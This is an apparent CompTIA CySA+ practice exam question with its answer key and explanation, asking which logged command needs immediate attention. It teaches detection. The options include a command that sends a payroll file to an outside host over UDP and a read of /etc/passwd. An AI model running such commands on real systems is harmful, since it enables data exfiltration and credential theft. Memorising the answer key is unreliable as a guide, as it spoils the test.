CompTIA CySA+ (CS0-001) — Question 267

A security analyst is performing a routine check on the SIEM logs related to the commands used by operators and detects several suspicious entries from different users. Which of the following would require immediate attention?

Answer options

• A. nmap ""A ""sV 192.168.1.235
• B. cat payroll.csv > /dev/udp/123.456.123.456/53
• C. cat/etc/passwd
• D. mysql ""h 192.168.1.235 ""u test -p

Correct answer: B

Explanation

The correct answer is B because redirecting sensitive files to a UDP address can lead to data exfiltration, which is a critical security issue. Option A is a network scanning command that may not be harmful by itself. Option C shows an attempt to read the password file, but it doesn't involve sending data out. Option D involves connecting to a MySQL database but does not indicate any malicious intent.